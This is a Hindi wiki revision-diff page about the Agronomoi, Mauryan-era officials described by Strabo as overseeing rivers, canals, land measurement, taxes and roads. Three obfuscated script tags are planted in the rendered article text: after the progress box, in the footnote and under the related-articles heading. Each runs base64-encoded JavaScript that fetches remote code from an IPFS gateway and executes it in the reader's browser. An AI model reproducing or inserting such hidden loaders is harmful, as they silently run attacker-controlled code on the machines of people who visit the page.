Difference between revisions of "अग्रोनोमोई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[यूनानी]] लेखक स्त्रावो के अनुसार, [[चन्द्रगुप्त मौर्य]] के समय में अग्रोनोमोई नामक अधिकारी नदियों की देखभाल, भूमि की नापजोख, जलाशयों का निरीक्षण और नहरों की देखभाल करते थे, ताकि सभी लोगों को पानी ठीक से मिल सके।  
+
[[यूनानी]] लेखक स्त्रावो के अनुसार, [[चन्द्रगुप्त मौर्य]] के समय में '''अग्रोनोमोई''' नामक अधिकारी नदियों की देखभाल, भूमि की नापजोख, जलाशयों का निरीक्षण और नहरों की देखभाल करते थे, ताकि सभी लोगों को पानी ठीक से मिल सके।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय इतिहास कोश |लेखक= सच्चिदानन्द भट्टाचार्य|अनुवादक= |आलोचक= |प्रकाशक=उत्तर प्रदेश हिन्दी संस्थान |संकलन= |संपादन= |पृष्ठ संख्या=06|url=}}</ref>
 +
 
 
*यह अधिकारी शिकारियों पर भी नियंत्रण रखता था और उसको लोगों को पुरस्कृत और दंड देने का अधिकार था।  
 
*यह अधिकारी शिकारियों पर भी नियंत्रण रखता था और उसको लोगों को पुरस्कृत और दंड देने का अधिकार था।  
 
*वह कर वसूलता था और भूमि के स्वामित्व सम्बन्धी मामलों का भी निरीक्षण करता था।  
 
*वह कर वसूलता था और भूमि के स्वामित्व सम्बन्धी मामलों का भी निरीक्षण करता था।  
 
*सार्वजनिक सड़कों का निर्माण और दस-दस [[स्टेडिया]] की दूरी पर स्तम्भ लगाने के काम का निरीक्षण भी यही अधिकारी करता था।  
 
*सार्वजनिक सड़कों का निर्माण और दस-दस [[स्टेडिया]] की दूरी पर स्तम्भ लगाने के काम का निरीक्षण भी यही अधिकारी करता था।  
*इसकी पहचान [[कौटिल्य]] [[अर्थशास्त्र]] में वर्णित 'अध्यक्ष' और [[अशोक के शिलालेख]] में वर्णित 'राजुक' से की जाती है।<ref>भारतीय इतिहास कोश पृष्ठ संख्या-06</ref>
+
*इसकी पहचान [[कौटिल्य]] [[अर्थशास्त्र]] में वर्णित 'अध्यक्ष' और [[अशोक के शिलालेख]] में वर्णित 'राजुक' से की जाती है।
{{लेख प्रगति
+
 
|आधार=
+
 
|प्रारम्भिक=प्रारम्भिक1
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{मौर्य काल}}
 +
[[Category:मौर्य काल]][[Category:प्राचीन भारत का इतिहास]][[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 05:34, 21 April 2018

yoonani lekhak stravo ke anusar, chandragupt maury ke samay mean agronomoee namak adhikari nadiyoan ki dekhabhal, bhoomi ki napajokh, jalashayoan ka nirikshan aur naharoan ki dekhabhal karate the, taki sabhi logoan ko pani thik se mil sake.[1]

  • yah adhikari shikariyoan par bhi niyantran rakhata tha aur usako logoan ko puraskrit aur dand dene ka adhikar tha.
  • vah kar vasoolata tha aur bhoomi ke svamitv sambandhi mamaloan ka bhi nirikshan karata tha.
  • sarvajanik s dakoan ka nirman aur das-das stediya ki doori par stambh lagane ke kam ka nirikshan bhi yahi adhikari karata tha.
  • isaki pahachan kautily arthashastr mean varnit 'adhyaksh' aur ashok ke shilalekh mean varnit 'rajuk' se ki jati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. bharatiy itihas kosh |lekhak: sachchidanand bhattachary |prakashak: uttar pradesh hindi sansthan |prishth sankhya: 06 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>